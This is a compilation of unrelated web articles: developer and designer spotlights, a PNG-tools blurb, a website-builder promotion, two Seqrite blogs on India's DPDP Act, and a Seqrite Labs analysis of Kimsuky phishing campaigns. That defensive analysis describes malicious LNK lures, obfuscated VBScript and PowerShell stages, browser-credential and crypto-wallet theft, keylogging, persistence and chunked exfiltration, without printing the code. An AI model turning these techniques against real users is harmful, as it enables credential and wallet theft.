In past Developer Spotlights, we’ve featured devs who’ve pushed the craft of building award-winning websites. But web development is more than just translating great design—Max Barvian is one of those pioneering devs who have a deep understanding of the core mechanics of frontend development. In 2024, he shared one of the coolest CSS-powered, scroll-driven animations with us here on Codrops. We can’t shine the light enough on Max, as his work represents the next frontier in web development—one that merges deep technical knowledge with creative experimentation.
Hi! My name is Max Barvian. I’m a UI engineer currently working at Clerk.
NumberFlow is an animated number component for React, Vue, Svelte, and vanilla TS/JS. It was heavily inspired by the number animations in the wonderful Family app:
The inspiration for NumberFlow. Video by Benji Taylor.
The response to NumberFlow has been surreal. 𝕏 is currently using it for their analytics dashboard, and Elon Musk even retweeted this screenshot of it:
When it came time to rebuild my portfolio last year, my goal was to make some combination of Godly and the Apple TV home screen. I’d really wanted a site like that for years, with a grid of project videos that smoothly transitioned into detail pages, but never felt confident about pulling it off. Then I found the View Transitions API. Despite its shortcomings (i.e. no interruption handling), it felt like the perfect tool for the job. View Transitions using snapshots of “old” views seemed perfect for the video grid, and meant I wouldn’t have to worry about animating a bunch of <video> elements at the same time. Ultimately, I had to use a few more tricks to get decent performance during the transitions, but I still can’t imagine having built the site with anything else. I was honored when Googlers Addy Osmani and Una Kravets shared my little site as a demo for View Transitions.
I stumbled upon this incredible design by Kevin Pham on Dribbble a couple years ago and immediately fell in love with it. I had wanted to experiment with CSS Scroll Snapping and 3D scenes for a while, and this seemed like the perfect candidate. I ended up using React Three Fiber, Motion for React, and Tailwind to implement it. It’s not perfect (there’s a pesky bug with mobile Safari on the last slide that I haven’t been able to fix), but I’m pretty happy with how it turned out. I was honored when Guillermo Rauch, Paul Henschel, Matt Perry, and Three.js all reposted it.
This work is probably the most boring on the list but I’m still happy with it. I was working on a Tailwind plugin for CSS clamp() when I encountered some longstanding accessibility issues with fluid type. I didn’t want to bring those issues into my plugin, so I spent a whole Sunday watching math videos on YouTube and talking to my physicist brother to figure out how to work around them. I eventually published the results in Smashing Magazine with some help from their great editors there, and was honored to see Adrian Roselli reference the work in his original article. Utopia, a popular fluid clamp generator, also integrated the findings into their tool.
About me
I got into creative development in a 7th grade journalism class, when my teacher made me the webmaster for our school newspaper. I asked my parents for Dreamweaver that year for Christmas and got my first freelance client a year after that. I’ve since moved on from Dreamweaver 🙂, but I’ve never wanted to do anything else professionally. I feel lucky that I’ve been able to make a career out of my passion.
Current challenges
At Clerk I’m working on building the component library we use for our dashboard. It’s been a fun challenge to try to build something that equally emphasizes UX and DX! I hope to share more on 𝕏 as it progresses. React Aria Components has been a huge inspiration here.
Tools
I basically live in VS Code writing React, Tailwind, and Motion code all day.
Philosophy
Someone I follow on 𝕏 thought NumberFlow was a good example of a quote by Charlie Munger:
“Take a simple idea and take it seriously.” —Charlie Munger
That’s stuck with me over the last few months, and I think it’s increased my enjoyment of projects I previously would’ve dismissed as too routine or boring.
It’s an honor to be featured on a site I’ve been reading my whole career. Thanks a lot, Manoela and the Codrops team!
Yesterday Online PNG Tools smashed through 6.32M Google clicks and today it’s smashed through 6.33M Google clicks! That’s 10,000 new clicks in a single day – the smash train keeps on rollin’!
What Are Online PNG Tools?
Online PNG Tools offers a collection of easy-to-use web apps that help you work with PNG images right in your browser. It’s like a Swiss Army Knife for anything PNG-related. On this site, you can create transparent PNGs, edit icons, clean up logos, crop stamps, change colors of signatures, and customize stickers – there’s a tool for it all. The best part is that you don’t need to install anything or be a graphic designer. All tools are made for regular people who just want to get stuff done with their images. No sign-ups, no downloads – just quick and easy PNG editing tools.
Who Created Online PNG Tools?
Online PNG Tools were created by me and my team at Browserling. We’ve build simple, browser-based tools that anyone can use without needing to download or install anything. Along with PNG tools, we also work on cross-browser testing to help developers make sure their websites work great on all web browsers. Our mission is to make online tools that are fast, easy to use, and that are helpful for everyday tasks like editing icons, logos, and signatures.
Who Uses Online PNG Tools?
Online PNG Tools and Browserling are used by everyone – from casual users to professionals and even Fortune 100 companies. Casual users often use them to make memes, edit profile pictures, or remove backgrounds. Professionals use them to clean up logos, design icons, or prepare images for websites and apps.
India’s retail sector is undergoing a significant digital transformation, with e-commerce, loyalty programs, and personalized marketing becoming the norm. This evolution means retailers are collecting and processing vast amounts of customer data, making compliance with the Digital Personal Data Protection (DPDP) Act 2023 a business necessity.
This blog explores why the DPDP Act is critical for the Indian retail ecosystem, highlighting its role in strengthening customer trust, enhancing data security, and ensuring responsible data management. By aligning with this legislation, retailers can meet regulatory requirements and differentiate themselves through stronger data governance and transparency.
Building Stronger Customer Relationships Through Trust
Customer trust is a critical business asset in today’s competitive retail landscape. The DPDP Act grants consumers (Data Principals) key rights over their data, including access, correction, and erasure under specific conditions. By aligning with the DPDP Act’s compliance framework, retailers can reinforce their commitment to data privacy and transparency, strengthening customer relationships.
These principles enhance brand credibility and foster long-term customer loyalty, positioning retailers as responsible data stewards in an evolving digital marketplace.
Ensuring Data Security in a Digital Marketplace
The retail sector faces growing cybersecurity risks, with data breaches potentially exposing sensitive customer information such as payment details and contact data. Under the DPDP Act, as Data Fiduciaries, retailers must implement robust security measures to prevent breaches and promptly notify the Data Protection Board of India and affected customers in case of an incident.
By prioritizing compliance-driven data security, retailers can mitigate cyber risks, protect customer information, and safeguard brand reputation, ensuring long-term business resilience in an increasingly digital landscape.
Promoting Fair and Transparent Data Practices
The DPDP Act enforces key principles like purpose limitation and data minimization. It requires retailers to collect only necessary data for defined purposes—such as processing transactions or personalizing offers—and retain it only as long as needed.
By adopting transparent data practices, retailers can ensure ethical data usage, reduce compliance risks, and enhance customer confidence. The Act also mandates clear customer notifications on data collection and usage, reinforcing trust and regulatory accountability in an increasingly data-driven retail landscape.
Ensuring Regulatory Compliance in a Growing Sector
The DPDP Act establishes a comprehensive legal framework for data protection, which is crucial for India’s rapidly expanding retail industry. Compliance ensures that retailers meet regulatory standards for processing digital personal data, mitigating risks of penalties and legal liabilities.
By aligning with the Act’s requirements, retailers can reinforce their commitment to ethical data practices, enhance customer trust, and operate with greater transparency and accountability in the evolving digital marketplace.
Empowering Consumers with Control Over their Data
The DPDP Act grants consumers the right to access, correct, and request the erasure of their digital personal data held by retailers. To ensure compliance, businesses must implement efficient mechanisms for handling these requests within the legal framework.
By prioritizing consumer data rights, retailers can enhance transparency, strengthen accountability, and foster trust, allowing customers to make informed decisions about the data they share—ultimately improving brand credibility and customer engagement.
Key Compliance Obligations for Retailers under the DPDP Act
Retailers must align with several critical obligations under the DPDP Act 2023 to ensure compliance and data protection:
Obtaining Informed Consent: Customer consent is required to process personal data, including marketing and loyalty programs.
Implementing Security Measures: Strong technical and organizational controls must safeguard customer data, such as secure access to corporate resources and endpoint protection.
Data Breach Notification: Any data breaches must be promptly reported to the Data Protection Board and affected customers.
Data Retention Policies: Clear policies must ensure customer data is retained only as long as necessary for its intended purpose.
Handling Data Principal Rights Requests: Efficient processes should be in place to manage customer requests for data access, correction, and erasure.
Potential Appointment of a Data Protection Officer (DPO): Large retailers classified as Significant Data Fiduciaries may be required to appoint a DPO for compliance oversight.
Navigating the Path to DPDP Compliance in Retail
Retailers must take a proactive approach to ensure compliance with the DPDP Act. This includes conducting a comprehensive assessment of current data processing practices and updating privacy policies to align with regulatory requirements.
Staff training on data privacy protocols and investing in data privacy management systems are essential. Additionally, retailers must establish clear procedures for obtaining and managing customer consent, ensuring compliance, transparency, and enhanced customer trust in the digital marketplace.
Building a Privacy-First Retail Ecosystem
The Digital Personal Data Protection Act 2023 is pivotal in strengthening data security and trust in India’s retail sector. The Act enhances customer relationships and industry integrity by enforcing responsible data handling, empowering consumers, and prioritizing privacy compliance.
Retailers who proactively adopt DPDP Act compliance fulfill legal requirements and gain a competitive edge by showcasing their commitment to customer data protection. Seqrite offers comprehensive data protection solutions to help retailers navigate compliance complexities and implement robust security frameworks. Contact us or visit our website for information.
Kimsuky: A Continuous Threat to South Korea with Deceptive Tactics
Contents
Introduction
Infection Chain
Initial Findings
Campaign 1
Looking into PDF document.
Campaign 2
Looking into PDF document.
Technical Analysis
Conclusion
Seqrite Protection
MITRE ATT&CK
IOCs
Introduction:
Security researchers at Seqrite Labs have recently uncovered two distinct campaigns carried out by the APT group “Kimsuky,” also known as “Black Banshee.” This group has been actively targeting South Korea using evolving tactics. In these campaigns, the threat actors delivered two South Korean government-themed documents as lures, specifically targeting government entities within South Korea.
In this blog, we will delve into the technical details of the campaigns uncovered during our analysis. We will examine the various stages of infection, starting with a phishing email containing an LNK (shortcut) file attachment. The LNK file was designed to drop an obfuscated VBA (Visual Basic for Applications) script, After de-obfuscating the script, we found that it was responsible for dropping two additional files: One Pdf file and One ZIP file The ZIP file contained four malicious files: two log files (1.log and 2.log), one VBA script (1.vba), and one PowerShell script (1.ps1). Both campaigns involved the same set of malicious files.
Infection Chain:
Fig .1 infection chain
Initial Findings:
Campaign-1:
In the first campaign, we identified a document related to tax reduction and tax payment related to revenue, which contained the same malicious LNK attachment. This attachment subsequently deployed a malicious VBScript, facilitating further compromise.
Fig .2 Revanue.pdf file
Based on our initial findings, we discovered that the adversary utilized a different document containing the same LNK file content.
Campaign-2:
In campaign-2, it has come to our attention that South Korea has enacted a new policy aimed at preventing recidivism among sex offenders. The initiative involves circulating a detailed document outlining the regulations, which was shared with households, daycare centers, kindergartens, and various local administrative offices, including township and village authorities, as well as neighbourhood community centres. However, hackers, including cyber-criminals, are exploiting this dissemination process by sending deceptive emails containing harmful attachments. These emails are targeting residential recipients and key personnel at local offices.
Fig .3 Sex Offender Personal Information Notification.pdf
The adversaries have exploited the distribution of this information and document by circulating it via email, disguised under the filename 성범죄자 신상정보 고지.pdf.lnk (Sex Offender Personal Information Notification.pdf.lnk). This attachment contains a malicious LNK file, which poses a cybersecurity threat to the recipients.
Technical Analysis and Methodology:
Campaign 1 & 2:
We have downloaded the file named 28f2fcece68822c38e72310c911ef007f8bd8fd711f2080844f666b7f371e9e1.lnk from campaign-1 and “성범죄자 신상정보 고지.pdf.lnk” from campaign-2 (Sex Offender Personal Information Notification.pdf.lnk) that was shared via email. During the analysis of this LNK file, it appears to be fetching additional files from an external C2 server, as shown in the snapshot below.
Fig.4 Downloading VBScript from C2 (Campaign –1)
Fig .5 Downloading VBScript From C2 (Campaign -2)
The file was downloaded from the URL provided above and saved into the Temp folder, as indicated below.
Fig .6 downloaded into Temp Folder (Campaign-1)
Fig .7 downloaded into Temp Folder (Campaign-2)
The file downloaded from the C2 server appears to be an obfuscated VBScript. Upon DE obfuscating the script, we discovered two additional files: one PDF and one ZIP file.
Fig .8 Obfuscated VB Script
The first section of the file is encoded in Base64 strings.
Fig .9 Base64 Encoded PDF
After Decoding we have found one PDF file.
Fig .10 PDF after Decoding
The second part of the VBScript is also encoded in Base64. After decoding it, we discovered a ZIP file.
Fig .11 Zip File
Fig. 12 Detect It Easy
Zip files contain the below numbers of files in it.
Fig .13 Inside Zip File
Within the ZIP archive, four files were identified: a VBScript, a PowerShell script, and two Base64-encoded text files. These encoded text files house obfuscated data, which, upon further dissection, may yield critical intelligence regarding the malware’s functionality and objectives. The following figures illustrate the encoded content of the two text files, which will be subsequently decoded and analysed to elucidate the next phase in the attack chain.
Fig. 14- 1 Log.txt file with Base64 encoding
Fig.15 – 2 Log .txt file with Base64 encoding
The 1.vbs file employs advanced obfuscation techniques, utilizing the chr() and CLng() functions to dynamically construct characters and invoke commands at runtime. This strategy effectively circumvents signature-based detection mechanisms, allowing the script to evade detection during execution.
Upon script termination, the concatenated characters form a complete command, which is subsequently executed. This command is likely designed to invoke the 1.ps1 PowerShell script, passing 1.log as an argument for further processing.
Fig .16 – 1.vbs
Upon attempting to DE-obfuscate the VBScript, we uncovered the following command-line execution, which subsequently triggers the PowerShell script for further processing.
Fig .17 De-Obfuscated VB Script
Upon executing the 1.vbs file, it triggered the invocation of the 1.ps1 file, as illustrated in the snapshot below.
Fig .18 Executing 1.VBS
The 1.ps1 script includes a function designed to decode Base64-encoded data from the 1.log file and execute the resulting script.
Fig.19 – 1.ps1 file
Fig.20 – 1 Log.txt after decoding
The 1.ps1 script retrieves the BIOS serial number, a unique system identifier, from the compromised host. This serial number is subsequently used to create a dedicated directory within the system’s temporary folder, ensuring that attack-related files are stored in a location specific to the compromised machine, as shown in above snapshot.
As a VM-aware sample, the script checks if it is executing within a virtual machine environment. If it detects a virtual machine, it will delete all four files associated with the attack (1.vbs, 1.ps1, 1.log, and any payload files stored in the directory named after the serial number), effectively halting its execution, as illustrated.
The script encompasses 11 functions that define the subsequent phases of the malware’s operation, which include data exfiltration, cryptocurrency wallet information theft, and the establishment of Command-and-Control (C2) communications. These functions are integral to the attack’s execution, facilitating the malware’s objectives and ensuring persistent communication with the threat actor.
List of malicious function retrieved from 1 log file:
UploadFile ():
The upload function exfiltrates data by transmitting it to the server in 1MB chunks, allowing it to handle large file sizes efficiently. The script awaits a response from the server, and if it receives an HTTP status code of “200,” it proceeds with further execution. If the response differs, the script terminates its operation. Each chunk is sent via an HTTP POST request, with the function verifying the success of each upload iteration before continuing.
Fig .21 UploadFile()
GetExWFile ():
The GetExWFile function iterates through a set of predefined hash tables containing cryptocurrency wallet extensions. When a match is found, it identifies the associated”.ldb” and ”.log” files linked to those extensions for exfiltration. These files are subsequently transferred to the specified destination folder, as indicated by the $Storepath variable.
Fig.22 GetExWFile ()
GetBrowserData ():
The script checks whether any of the following browsers—Edge, Firefox, Chrome, or Naver Whale—are actively running, to extract user profile data, including cookies, login credentials, bookmarks, and web data. Prior to collecting this information, the script terminates the browser processes to ensure uninterrupted access. It then proceeds to retrieve data on installed extensions and cache files, such as webcacheV01.dat, for each identified browser. For certain browsers, it also performs decryption operations to unlock encrypted keys, allowing it to extract sensitive information, which is then stored alongside the decrypted master encryption key.
Fig.23 BrowserData ()
Download file () :
The download file function downloads any file based on the C2 command.
Fig.24 Download File ()
RegisterTask () :
It creates persistence for the files “1.log” and “1.vbs”.
Fig.25 RegisterTask()
Send ():
The send () function uploads all the collected information to the server after compressing the data into a ZIP file named “init.zip”. It then renames the ZIP file to “init.dat” and deletes all backup files from the system after uploading.
Fig.26 Send ()
The execution flow of the functions follows a sequence where several actions are carried out within the attack. Among these functions, one triggers another PowerShell command that calls the 2.log file, which is responsible for performing keylogging activities.
Fig. 27 Flow of execution of functions and command to execute “2.log”.Fig.28 Executing 2 log file
Fig.29 Inside 2 log file
The decoded content of the 2.log file is shown above. It contains a script that imports essential Windows API functions for detecting key presses, retrieving window titles, and managing keyboard states. The script executes actions such as clipboard monitoring, keystroke logging, and recording window titles.
Fig. 30.2 Code for clipboard monitoring.
Conclusion
As observed, threat actors are utilizing time-consuming, multi-component techniques that are interlinked to enhance their evasiveness. Unlike other stealers, this one primarily focuses on network-related information, which could be leveraged for active reconnaissance. Given that the stealer targets sensitive user data, it is crucial to protect yourself with a reputable security solution such as Seqrite Antivirus in today’s digital landscape. At Seqrite Lab, we provide detection capabilities for such stealers at various stages of infection, along with protection against the latest threats.
Seqrite Protection:
Trojan.49424.SL
Trojan.49422.C
MITRE ATT&CK:
Initial Access
T1566.001
Phishing: Spearphishing Attachment
Execution
T1059.001
T1059.005
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: Visual Basic
Persistence
T1547.001
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion
T1140
Deobfuscate/Decode Files or Information
Credential Access
T1555.003
Credentials from Password Stores: Credentials from Web Browsers
Meet Stephanie Bruce, an Independent Designer and Webflow Developer based in London, UK. She has been designing for over 2 years, previously working in Finance.
She loves editorial layouts, photography and visually creative web designs. She works closely with agencies and clients worldwide.
In this spotlight, Stephanie shares a selection of her favorite projects — a window into her creative process, inspirations, and evolution as a designer.
Featured work
Valentine
This is my latest project where I did the art direction, photography direction, web design and development for Freewrite Valentine. The main purpose of the website is to promote their latest Freewrite Valentine, playing tribute to the original Olivetti Valentine typewriter.
I used retro ads and posters as the main inspiration for the web design and photography direction. We decided to go with a bold red colour throughout the website to emphasise the retro red vibes. I had a two weeks deadline to design and build, as well as photography direction.
MOD Agency Collab
A web design project I did at MOD agency, with creative director Matt Jumper. My role was to design the website and create data visuals. It was my first time designing data visuals and I was pretty happy with how fun they turned out. Huge thanks to Mod agency for bringing me along for this project.
SP28K
SP28K was an exploration website I did on the Flow Party On Demand course. For this design I decided to explore brutalist design with a touch of editorial layout. This project challenged me to go for a bold approach using expressive typography and high-contrast fonts. Photoshoot of the speaker was done in Spline.
Concepts and explorations
Outside of client work, I love spending time creating my own concepts and web design explorations. By creating concept work, I learnt how much I love editorial, photography based websites and how I hope to attract similar work in the near future.
Especially being a relatively new designer, these concepts have helped me get noticed on social media and led to many opportunities.
Brief biography and career highlights
I switched careers from Finance to Design over two years ago. I wanted to find a job that I loved, and once I discovered the world of Digital Design, I became pretty obsessed. I feel like I found my calling.
When I worked in Finance, I spent a lot of my spare time immersed in the creative world. I would go to exhibitions, galleries, theatre plays, etc. I also studied Photography, which helped me develop an eye for detail and composition. I feel that the combination of my exposure to the arts and my photography skills has played a big role in developing a strong visual eye for design.
Since changing careers, I’ve had some amazing opportunities to work with leading designers and agencies — from a six-month internship with Fons Mans to collaborations with designers like Dann Petty and Benten Woodring.
I’ve been freelancing since the beginning of my design career and am very grateful that my work and network have led to multiple collaborations with international clients and agencies.
Inspiration
I find that most of my inspiration comes from looking at design outside of web design. I often look at magazine layouts, prints/posters, and branding assets. Exploring these areas challenges me to create things you don’t typically see on websites.
I also draw a lot of inspiration from visiting art galleries and exhibitions around London, as well as from films and video games like Firewatch and Before Your Eyes.
Future Goals
Currently, I’m focused on working with agencies, as I enjoy collaborating and learning as much as possible from them.
In the near future, I’d love to work with lifestyle and e-commerce clients, and maybe team up with someone to create a purposely small, boutique agency.
Message to Readers
Put in the time to practice design, and get comfortable with sharing your work online and networking — it can lead to so many opportunities and collaborations.
I’d also say it’s totally fine to explore different skills at the beginning, but I recommend committing to mastering one or two that truly excite you. Stay open to learning and keep pushing yourself to improve, no matter how many years of experience you have.
Feel free to reach out to me on Twitter or Instagram — whether you have a project in mind or just want to grab a coffee, in person or online!
Let’s be real—building a WordPress site with traditional page builders can feel like assembling IKEA furniture with missing pieces.
You install a page builder only to find out it doesn’t do half the things you need. So you pile on plugins to fill the gaps, and they end up conflicting with one another.
Your site slows down, SEO takes a hit, and suddenly, you’re knee-deep in subscription fees, support tickets, and messy workarounds.
It’s 2025. We deserve better.
That era of outdated page builders and plugin-heavy setups is over.
Today’s web demands speed, flexibility, and full creative control—minus the bloat and the added costs. That’s where Droip comes in. A new kind of builder made for modern creators.
But what makes it unique? Let’s break it down.
All-in-One Web Building Ecosystem
Droip is a full-fledged, no-code ecosystem that lets you build smarter.
Whether it’s SEO, forms, popups, dynamic content, or even image editing, Droip handles it natively.
Because it’s all native, your site stays lean, fast, and conflict-free. Oh, and your wallet? It stays happy too.
What that means for you:
No surprise costs or upgrade traps.
Faster load times and better performance.
One support team, one solution.
Scales with your business—whether you’re a solo creator or running a full agency.
Pricing: It’s transparent, with no hidden upsells. Check the Pricing page for the details.
To learn how Droip works, watch a quick video overview of Droip in action.
Modern UI With Maximum Control
Let’s start with the UI.
The moment you open the editor, everything feels intuitive.
It’s sleek. It’s modern. It’s not that stiff, clunky layout you’ve seen in other WordPress builders.
Instead, the editor gives you an interface that feels familiar, like the modern major web builders you already know, but packs the kind of power only Droip can deliver.
Everything’s exactly where you expect it to be.
The menu panels are clean and concise. Element settings are instantly accessible.
The UX flows effortlessly from dragging elements to switching panels, it’s all frictionless.
And yes, it also has both dark and light modes for your comfort.
Overall, it provides a clean, smooth workspace designed to help you move fast and build without barriers.
Design Freedom For Everyone
When it comes to design, Droip hands you the keys to total design freedom.
Whether you’re starting from scratch or using predesigned layouts, you have all the flexibility and options.
A Growing Collection of Stunning Templates
Start with Droip’s growing collection of stunning templates, from sleek portfolios to bold business sites. They’re professionally designed, fully customizable, and included in your subscription (no sneaky extra fees)!
Pre-Made Sections, Pages, and Components
Mix and match ready-made sections, pages, and components like contact forms, testimonials, cards, and more. It’s like having a design toolkit at your fingertips. Just drag, drop, customize if needed, and you’re all set.
Turn Figma Designs into Fully Editable Pages—In Seconds
Imagine dragging in your Figma mockup and watching it become a live, editable page in seconds. If you have got your site designed in Figma, you can just copy and paste it into Droip—yes, literally.
The builder instantly converts it into a fully editable, auto-responsive page with a single click. And the best part? It automatically adapts to all breakpoints, including any custom ones you define.
Want to Start from Scratch? Go for It!
If you’re the “I want full control” type, Droip’s intuitive drag-and-drop canvas is all yours. Build pixel-perfect layouts, experiment, and make it yours.
Droip was built with the atomic approach to give you granular control over every aspect of your website. With deep element editing, you can adjust every detail, from typography to layouts, to fit your exact vision.
Native Dynamic Content. No ACF Required.
Managing dynamic content in WordPress usually means extra plugins like ACF. Not anymore.
Droip lets you create, manage, and style dynamic content like listings, directories, and portfolios right out of the box.
Connect your content, customize it visually, and even set dynamic SEO for every item’s detail page. All built-in and all visual.
A Smarter Media Manager That Works Like a Design Tool
Droip’s media manager is not just for organizing images.
You can crop, resize, add filters, or create custom text paths all inside Droip’s powerful native media manager.
Image Editing Tools
One of the standout features of Droip’s media manager is its advanced image editing capabilities.
Edit your images directly within Droip, from basic cropping and resizing to applying advanced filters, without relying on third-party tools.
Text Path Creation
Another innovative feature is the ability to create text paths. This allows you to design text that follows any path or shape for that extra creative edge.
Extensive Icons & Shapes library
Droip has an extensive library of shapes so you can do more than ever.
You can leverage an array of distinctive shapes, customize them to create unique visuals, and effortlessly add them to any part of your website.
Plus, it also houses a vast collection of high-quality icons, all ready to be refined to perfection.
Instant Global Styling Sync with Variables
Most builders make global styling difficult with scattered controls. But this WordPress builder has a dedicated feature called Variables that allows you to save and apply reusable styles across your entire site.
The system is centralized and features a real-time preview, meaning you can update your design in seconds. Say you want to tweak your brand’s primary color. Change it once, and Droip updates every button, heading, and section styled with that variable instantly.
You can also create multiple styling modes, such as light and dark themes, and switch between them with a single click—perfect for seasonal refreshers or theme updates.
Reusable Components with Symbols
Droip also comes with a feature called Symbols, which lets you turn any element along with all of its nested children into a reusable component.
That means if you build something once like a button, a pricing card, or even an entire section, you can reuse it throughout the site
You can even set your global header and footer as Symbols, which makes keeping everything consistent across your site way easier.
Immersive Interactions and Animations
If you have been settling for basic motion, a few hover effects, maybe a fade-in or two, it’s time to achieve more.
Droip has rich interactions and animation capabilities. You can create immersive, responsive experiences that feel polished and purposeful—not just flashy. From hover effects to scroll-based reveals, you’re free to build any web interactions.
And when you’re ready to go beyond simple effects, it has an interaction timeline that gives you a visual playground to choreograph complex, multi-step animations with ease. Paired with the custom timing editor, you can shape how your animation flows down to the finest detail.
Text Animations
It also approaches Text Animations with the same depth and flexibility. You can choose your trigger, select transition styles, and animate at the character, word, or element level.
You can fine-tune every movement, like speed, direction, intensity, delay, and duration, until it’s just right.
Multiple Backgrounds & Effects
Droip offers robust options for layering multiple backgrounds and shadow effects.
You can layer multiple backgrounds from solid colors to gradients (linear, radial, conic) or images for dynamic, vibrant designs.
Combine that with shadow effects for added depth and dimension, and you can create a truly unique visual experience without being limited by pre-set templates.
Droip Apps for Seamless Integrations
Droip has a convenient approach when it comes to connecting integrations.
You can directly install and connect third-party integrations without leaving the builder and automate workflows by integrating essential tools like analytics, email marketing, and customer support.
Native Pop-up Builder
The built-in popup builder also checks all the right boxes, giving you full control over both design and behavior.
Design your pop-ups visually, set visibility conditions, and choose custom triggers, whether it’s a click, scroll, or exit intent. You can position them exactly where you want on the screen.
But that’s not all. You can also customize the appearance with smooth transitions, whether it’s a subtle notification or a full-screen takeover.
Form Builder with Built-in Form Data Manager
Creating forms elsewhere can be a hassle, requiring multiple tools to manage both form design and data collection.
But with this no-code website builder, you can practically design any web form and then access and manage form data with the built-in Form Data Manager.
Whether you’re collecting leads, registrations, or feedback, Droip combines form creation and data management in one place.
Unlimited Breakpoints for Responsiveness
Many builders limit your ability to adjust responsiveness across devices, leaving you with only a few pre-set breakpoints.
Here, however, you can define unlimited breakpoints and fine-tune responsiveness for every screen size, ensuring your design adapts perfectly.
AI-Powered Website Creation
Droip also has AI features to assist and accelerate your entire workflow.
You can instantly generate page structures and layouts, all with a single prompt. It intelligently understands your content and automatically creates optimal layouts, which are neatly structured and easily accessible in the Layers Panel.
And if you need help crafting the perfect copy, it can do that too. It even generates meta titles and descriptions, saving you time while ensuring your site stays optimized for search engines.
Role Manager
Another essential feature for managing your website is the Role Manager.
With the Role Manager in Droip, you can control what users can access and edit within the Droip Editor.
Whether you’re working solo or collaborating with a team, Droip lets you customize who has access to what in a pretty straightforward way.
Accessibility Built-in
Accessibility is often left to external plugins in other platforms. But Droip bakes it right into the experience.
From increasing text size and reducing motion to enabling larger cursors and magnifying content, the builder offers a wide range of built-in tools to offer an inclusive website creation experience. It also includes support for various visual impairments, like color blindness.
It also has a built-in color contrast checker to ensure that your text is readable and your color choices meet accessibility standards.
Dynamic and AI-Powered SEO
For SEO, you get the basics: meta titles, descriptions, and Open Graph tags, all easily editable for every page. Even better, you can generate SEO metadata automatically with AI, saving you time.
But when working with dynamic content, Droip takes SEO a step further.
You can set dynamic SEO, so you don’t have to write SEO data for every single dynamic detail page. Whether it’s a product catalog or course listings, dynamic SEO optimizes the individual detail pages automatically, saving you from manual updates.
No Performance Compromise
With so many powerful features built into the platform, you might wonder if performance takes a hit.
But no.
While other traditional WordPress page builders produce bloated code or excessive scripts, Droip delivers clean, minimal markup so even the most complex site loads fast and smooth.
Automatic Page Audit for Quality Control
Most platforms leave quality control up to you.
But Droip has a Page Audit feature that automatically catches issues before they become problems.
Whether it’s missing alt text, links, or class names, you’ll get a clear report so you can publish with confidence.
Final Verdict
With its packed feature set, slick UI, and native performance, it’s clear that Droip is a complete powerhouse solution at an unbeatable price.
It’s sleek, it’s powerful, and it’s exactly what WordPress has been waiting for.
Where other builders hit their limits, Droip puts you in the driver’s seat, giving you the freedom and tools to craft extraordinary websites.
So, if you’re still patching plugins together and wasting your money, it’s time to try Droip to feel the difference.
The Digital Personal Data Protection (DPDP) Act 2023 marks a pivotal shift in India’s data protection framework, setting clear guidelines for managing personal data. For the Banking, Financial Services, and Insurance (BFSI) sectors, which process vast volumes of sensitive customer information, this legislation is not just another compliance requirement but a strategic imperative.
The DPDP Act 2023 strengthens data security, fosters customer trust, and enhances regulatory alignment, making it a cornerstone for a resilient and customer-centric BFSI ecosystem. This blog delves into the critical reasons why this legislation is essential for the sector.
Building Customer Trust and Confidence
In the BFSI sector, trust is the foundation of strong customer relationships. The DPDP Act 2023 enhances this trust by empowering individuals (Data Principals) with greater control over their personal data, including rights to access, rectify, and request erasure under specific conditions. By aligning with the DPDP Act’s principles, BFSI organizations can reinforce their commitment to data privacy and security, strengthening customer confidence.
This proactive approach safeguards compliance and becomes a competitive differentiator in an era where data protection is a key driver of customer loyalty and business growth.
Enhanced Regulatory Compliance
The BFSI sector in India operates within a highly regulated ecosystem, overseen by authorities such as the Reserve Bank of India (RBI), the Securities and Exchange Board of India (SEBI), and the Insurance Regulatory and Development Authority of India (IRDAI). The DPDP Act 2023 complements these existing regulations by establishing a unified data protection framework for the sector.
Ensuring compliance with the DPDP Act helps BFSI organizations meet their legal obligations regarding handling digital personal data. It also mitigates the risks of regulatory penalties and legal repercussions, reinforcing operational resilience and trust.
Strengthening Data Security
Due to the highly sensitive financial and personal data it handles, the BFSI sector remains a prime target for cyberattacks and data breaches. The DPDP Act 2023 reinforces security by requiring Data Fiduciaries (entities processing personal data) to implement robust safeguards to prevent breaches and mandating timely notifications to the Data Protection Board of India and affected individuals in case of an incident.
By adhering to these stringent security requirements, BFSI institutions can enhance cybersecurity resilience, mitigate risks, and safeguard customer trust and brand reputation in an increasingly threat-prone digital landscape.
Promoting Responsible Data Handling
The DPDP Act 2023 enforces key data protection principles, including purpose, data minimization, and storage limitations. For the BFSI sector, this translates to collecting only essential data for defined purposes, retaining it for the necessary duration, and ensuring its accuracy and integrity.
By adopting these responsible data management practices, BFSI organizations can mitigate risks associated with data misuse, strengthen regulatory compliance, and reinforce customer trust. It ensures that personal information is handled with the highest standards of security and diligence.
Enabling Innovation with Safeguards
While prioritizing data protection, the DPDP Act 2023 also acknowledges the need for lawful data processing to drive innovation and service excellence. For the BFSI sector, this enables firms to leverage data for customer insights, risk assessment, and hyper-personalization within a consent-driven framework, ensuring transparency and accountability.
The Act provides a clear legal foundation for responsible data utilization, empowering BFSI organizations to enhance customer experience, optimize decision-making, and accelerate business growth while maintaining regulatory compliance.
Key Aspects of the DPDP Act Relevant to BFSI
Several key provisions of the DPDP Act 2023 are particularly critical for the BFSI sector:
Consent Requirements: BFSI firms must obtain explicit and informed consent from customers before processing personal data, with limited exceptions for legitimate purposes.
Data Security Obligations: Implementing robust technical and organizational safeguards to protect personal data is mandatory.
Data Breach Notification: Firms must promptly report breaches to the Data Protection Board and affected customers to ensure transparency and accountability.
Data Retention Policies: BFSI entities must establish clear retention policies, ensuring data is stored only for as long as necessary for its intended purpose.
Rights of Data Principals: Organizations must enable customers to access, correct, and request erasure of their personal data through well-defined mechanisms.
Obligations of Significant Data Fiduciaries: Given the high volume and sensitivity of data handled, many BFSI firms will be classified as Significant Data Fiduciaries, requiring additional compliance measures such as appointing a Data Protection Officer (DPO) and conducting Data Protection Impact Assessments (DPIAs).
Challenges and Opportunities
Implementing the DPDP Act 2023 presents challenges for the BFSI sector, including adapting existing data processing systems, training employees on compliance requirements, and streamlining consent management. However, these challenges also serve as strategic opportunities to enhance data governance frameworks, fortify cybersecurity measures, and foster greater transparency with customers.
By proactively addressing these aspects, BFSI organizations can ensure compliance, strengthen trust, improve operational resilience, and drive long-term business growth in an evolving regulatory landscape.
Conclusion
